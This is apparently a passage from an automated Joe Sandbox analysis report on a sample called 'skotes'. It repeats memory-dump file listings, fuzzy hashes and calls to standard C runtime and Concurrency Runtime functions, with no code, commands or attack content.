                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3403738998-0
                                                                                                                                                                • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                • Instruction ID: f4d6ab2bf75dd94e450c9b31e1e3313aa7622d3d57b033e0080bf123f6b6c094
                                                                                                                                                                • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                • Instruction Fuzzy Hash: 495151B1A04209ABDF18DF64C495BEDB3E8FF49304F4540A9E915EB281DB74AE45CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00BB53A0
                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00BB53C7
                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00BB54D3
                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00BB55AE
                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00BB5650
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                • API String ID: 4162181273-393685449
                                                                                                                                                                • Opcode ID: fceee1d243b429662645179417c0468a77e75643e5f0222b4a3e13771c0eaac3
                                                                                                                                                                • Instruction ID: 390fcc9acef3c58ba1050388d12d1cf604dbcf80c4838df105c5e3f483a11682
                                                                                                                                                                • Opcode Fuzzy Hash: fceee1d243b429662645179417c0468a77e75643e5f0222b4a3e13771c0eaac3
                                                                                                                                                                • Instruction Fuzzy Hash: 8DC15771900A09AFCF35DFA4D880AFEBBF5FF14311B14419AE8066B212D7B1DA51CB92
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00BA73B0
                                                                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00BA73F2
                                                                                                                                                                • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00BA740E
                                                                                                                                                                • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00BA7419
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA7440
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                • API String ID: 3897347962-3650809737
                                                                                                                                                                • Opcode ID: 4908a7aa18ab399f986399947b3330c91fd5cbe07d32c5ffde024859f7e08d75
                                                                                                                                                                • Instruction ID: 57e1291a093c18a5b0165780c6289a5e2f3be49daf31233f762b2de424a0e2f4
                                                                                                                                                                • Opcode Fuzzy Hash: 4908a7aa18ab399f986399947b3330c91fd5cbe07d32c5ffde024859f7e08d75
                                                                                                                                                                • Instruction Fuzzy Hash: 9F213034A48209AFCF14EF58C895AADBBF5EF0A350F1440E9E805A7351DF30AD05CB94
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BA7903
                                                                                                                                                                  • Part of subcall function 00BA5CB8: __EH_prolog3_catch.LIBCMT ref: 00BA5CBF
                                                                                                                                                                  • Part of subcall function 00BA5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BA5CF8
                                                                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BA792A
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BA7936
                                                                                                                                                                  • Part of subcall function 00BA5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00BA5D70
                                                                                                                                                                  • Part of subcall function 00BA5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00BA5D7E
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00BA7982
                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00BA79A3
                                                                                                                                                                • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00BA79AB
                                                                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00BA79BD
                                                                                                                                                                • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00BA79ED
                                                                                                                                                                  • Part of subcall function 00BA691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00BA6942
                                                                                                                                                                  • Part of subcall function 00BA691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00BA6965
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1475861073-0
                                                                                                                                                                • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                • Instruction ID: 3bda15d3c564666f5b57853c52f3f53df839d222856e8ce69b6e7026ad0ccbb2
                                                                                                                                                                • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                • Instruction Fuzzy Hash: 8631C031B8C255BACF16AA784C927FFBBE59F47300F0401EAD495D7242EE244D4A8791
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00BB4877
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00BB487F
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00BB4908
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00BB4933
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00BB4988
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
